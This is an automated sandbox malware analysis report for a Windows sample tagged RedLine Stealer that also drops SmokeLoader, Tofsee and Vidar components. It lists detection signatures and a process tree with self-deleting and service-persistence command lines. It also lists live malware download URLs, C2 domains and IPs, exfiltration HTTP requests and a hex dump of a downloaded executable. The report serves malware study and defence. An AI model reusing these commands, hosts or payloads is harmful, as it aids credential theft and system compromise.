Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3YzgU3S0nW.exe

Overview

General Information

Sample Name:3YzgU3S0nW.exe
Analysis ID:546826
MD5:720b195655e0a571c4d511088b51202b
SHA1:f171845fe7b3ae9576ea0f698edd8d65d6bf6ead
SHA256:eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
PE file has a writeable .text section
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Del in CommandLine
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE file contains more sections than normal
Connects to a URL shortener service
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to detect virtual machines (STR)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • 3YzgU3S0nW.exe (PID: 7072 cmdline: "C:\Users\user\Desktop\3YzgU3S0nW.exe" MD5: 720B195655E0A571C4D511088B51202B)
    • 3YzgU3S0nW.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\3YzgU3S0nW.exe" MD5: 720B195655E0A571C4D511088B51202B)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 7085.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\7085.exe MD5: 720B195655E0A571C4D511088B51202B)
          • 7085.exe (PID: 6904 cmdline: C:\Users\user\AppData\Local\Temp\7085.exe MD5: 720B195655E0A571C4D511088B51202B)
        • 8132.exe (PID: 5624 cmdline: C:\Users\user\AppData\Local\Temp\8132.exe MD5: A181F86F7191ED7680953213C7239305)
          • cmd.exe (PID: 672 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\8132.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • timeout.exe (PID: 4876 cmdline: timeout /t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
        • 8A8A.exe (PID: 5776 cmdline: C:\Users\user\AppData\Local\Temp\8A8A.exe MD5: AD639AA5FF468BA6F8A7503FD5BF89BD)
          • cmd.exe (PID: 5100 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\tfktmtml\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6404 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\atingifo.exe" C:\Windows\SysWOW64\tfktmtml\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6580 cmdline: C:\Windows\SysWOW64\sc.exe" create tfktmtml binPath= "C:\Windows\SysWOW64\tfktmtml\atingifo.exe /d\"C:\Users\user\AppData\Local\Temp\8A8A.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 2928 cmdline: C:\Windows\SysWOW64\sc.exe" description tfktmtml "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 9355.exe (PID: 5160 cmdline: C:\Users\user\AppData\Local\Temp\9355.exe MD5: 7FCE0E163EA7948C10B044B1EA77DAD9)
          • 9355.exe (PID: 5816 cmdline: C:\Users\user\AppData\Local\Temp\9355.exe MD5: 7FCE0E163EA7948C10B044B1EA77DAD9)
          • 9355.exe (PID: 4852 cmdline: C:\Users\user\AppData\Local\Temp\9355.exe MD5: 7FCE0E163EA7948C10B044B1EA77DAD9)
  • svchost.exe (PID: 7116 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6224 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4588 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6368 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6344 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6024 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5504 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5876 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 4848 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6760 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7004 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • ahtdegs (PID: 6404 cmdline: C:\Users\user\AppData\Roaming\ahtdegs MD5: 720B195655E0A571C4D511088B51202B)
    • ahtdegs (PID: 6892 cmdline: C:\Users\user\AppData\Roaming\ahtdegs MD5: 720B195655E0A571C4D511088B51202B)
  • svchost.exe (PID: 5416 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000002B.00000000.443464761.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    0000002B.00000000.444404924.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000018.00000002.448461054.0000000003591000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0000002B.00000000.442960124.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000002B.00000002.524710440.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 14 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.1.3YzgU3S0nW.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              1.2.3YzgU3S0nW.exe.8715a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                23.2.8A8A.exe.400000.0.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                  23.3.8A8A.exe.880000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                    17.1.7085.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      Click to see the 21 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Copying Sensitive Files with Credential DataShow sources
                      Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\atingifo.exe" C:\Windows\SysWOW64\tfktmtml\, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\atingifo.exe" C:\Windows\SysWOW64\tfktmtml\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\8A8A.exe, ParentImage: C:\Users\user\AppData\Local\Temp\8A8A.exe, ParentProcessId: 5776, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\atingifo.exe" C:\Windows\SysWOW64\tfktmtml\, ProcessId: 6404
                      Sigma detected: Suspicious Del in CommandLineShow sources
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\8132.exe" & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\8132.exe" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\8132.exe, ParentImage: C:\Users\user\AppData\Local\Temp\8132.exe, ParentProcessId: 5624, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\8132.exe" & exit, ProcessId: 672
                      Sigma detected: New Service CreationShow sources
                      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\SysWOW64\sc.exe" create tfktmtml binPath= "C:\Windows\SysWOW64\tfktmtml\atingifo.exe /d\"C:\Users\user\AppData\Local\Temp\8A8A.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\SysWOW64\sc.exe" create tfktmtml binPath= "C:\Windows\SysWOW64\tfktmtml\atingifo.exe /d\"C:\Users\user\AppData\Local\Temp\8A8A.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\8A8A.exe, ParentImage: C:\Users\user\AppData\Local\Temp\8A8A.exe, ParentProcessId: 5776, ProcessCommandLine: C:\Windows\SysWOW64\sc.exe" create tfktmtml binPath= "C:\Windows\SysWOW64\tfktmtml\atingifo.exe /d\"C:\Users\user\AppData\Local\Temp\8A8A.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 6580

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                      Source: http://privacytools-foryou-777.com/downloads/toolspab2.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/game.exeAvira URL Cloud: Label: malware
                      Antivirus detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\atingifo.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeReversingLabs: Detection: 44%
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeReversingLabs: Detection: 62%
                      Source: C:\Users\user\AppData\Local\Temp\F338.exeReversingLabs: Detection: 41%
                      Source: C:\Users\user\AppData\Local\Temp\FFBD.exeReversingLabs: Detection: 44%
                      Source: C:\Users\user\AppData\Roaming\ahtdegsReversingLabs: Detection: 44%
                      Machine Learning detection for sampleShow sources
                      Source: 3YzgU3S0nW.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\F338.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\ahtdegsJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\atingifo.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeJoe Sandbox ML: detected
                      Source: 23.2.8A8A.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 22.2.8132.exe.790e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 22.3.8132.exe.7b0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 23.3.8A8A.exe.880000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 23.2.8A8A.exe.860e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00407190 CryptUnprotectData,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeUnpacked PE file: 22.2.8132.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeUnpacked PE file: 23.2.8A8A.exe.400000.0.unpack
                      Source: 3YzgU3S0nW.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49799 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49830 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.15:443 -> 192.168.2.3:49831 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49833 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.41.11:443 -> 192.168.2.3:49835 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 164.132.207.80:443 -> 192.168.2.3:49836 version: TLS 1.2
                      Source: Binary string: C:\nanu\zopesagofolux\sufok-bududik\ti.pdb source: 3YzgU3S0nW.exe, ahtdegs.11.dr, 7085.exe.11.dr
                      Source: Binary string: C:\micat\xi.pdb source: 8132.exe, 00000016.00000000.396000995.0000000000401000.00000020.00020000.sdmp, 8132.exe.11.dr
                      Source: Binary string: C:\wapegise51 ricejuvosara\botudi malofinozataci\nad41\jotevut.pdb source: F338.exe.11.dr
                      Source: Binary string: C:\hevetuzovuxa.pdb source: 8A8A.exe, 00000017.00000000.402772293.0000000000401000.00000020.00020000.sdmp, 8A8A.exe, 00000017.00000002.444702730.0000000000A92000.00000004.00000001.sdmp, atingifo.exe.23.dr, 8A8A.exe.11.dr
                      Source: Binary string: HC:\hevetuzovuxa.pdb source: 8A8A.exe, 00000017.00000000.402772293.0000000000401000.00000020.00020000.sdmp, 8A8A.exe, 00000017.00000002.444702730.0000000000A92000.00000004.00000001.sdmp, atingifo.exe.23.dr, 8A8A.exe.11.dr
                      Source: Binary string: .C:\wapegise51 ricejuvosara\botudi malofinozataci\nad41\jotevut.pdb source: F338.exe.11.dr
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49861 -> 185.163.204.24:80
                      Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49861 -> 185.163.204.24:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: dodecoin.org
                      Source: C:\Windows\explorer.exeDomain query: bitly.com
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: short.link
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: bit.ly
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /tratata.php HTTP/1.1Host: file-file-host4.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /sqlite3.dll HTTP/1.1Host: file-file-host4.comCache-Control: no-cacheCookie: PHPSESSID=rd3dm5mqbrt7b88g82ka584gmv
                      Source: global trafficHTTP traffic detected: POST /tratata.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DJMYU3ECBA1NYUA1Host: file-file-host4.comContent-Length: 104940Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=rd3dm5mqbrt7b88g82ka584gmv
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:40 GMTContent-Type: application/x-msdos-programContent-Length: 347136Connection: closeLast-Modified: Fri, 31 Dec 2021 18:22:02 GMTETag: "54c00-5d4753f51d529"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 23 4f a3 99 42 21 f0 99 42 21 f0 99 42 21 f0 0a 0c b9 f0 98 42 21 f0 f6 34 bf f0 88 42 21 f0 f6 34 8b f0 f6 42 21 f0 90 3a b2 f0 9a 42 21 f0 99 42 20 f0 28 42 21 f0 f6 34 8a f0 ae 42 21 f0 f6 34 bb f0 98 42 21 f0 f6 34 bc f0 98 42 21 f0 52 69 63 68 99 42 21 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e6 59 56 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 12 04 00 00 d6 33 00 00 00 00 00 10 4a 02 00 00 10 00 00 00 30 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 38 00 00 04 00 00 cf 1d 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 11 04 00 28 00 00 00 00 70 37 00 90 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 00 64 22 00 00 30 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f6 11 04 00 00 10 00 00 00 12 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 0c 2a 33 00 00 30 04 00 00 8c 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 75 68 69 00 00 00 05 00 00 00 00 60 37 00 00 02 00 00 00 a2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 4e 00 00 00 70 37 00 00 50 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 de 56 00 00 00 c0 37 00 00 58 00 00 00 f4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
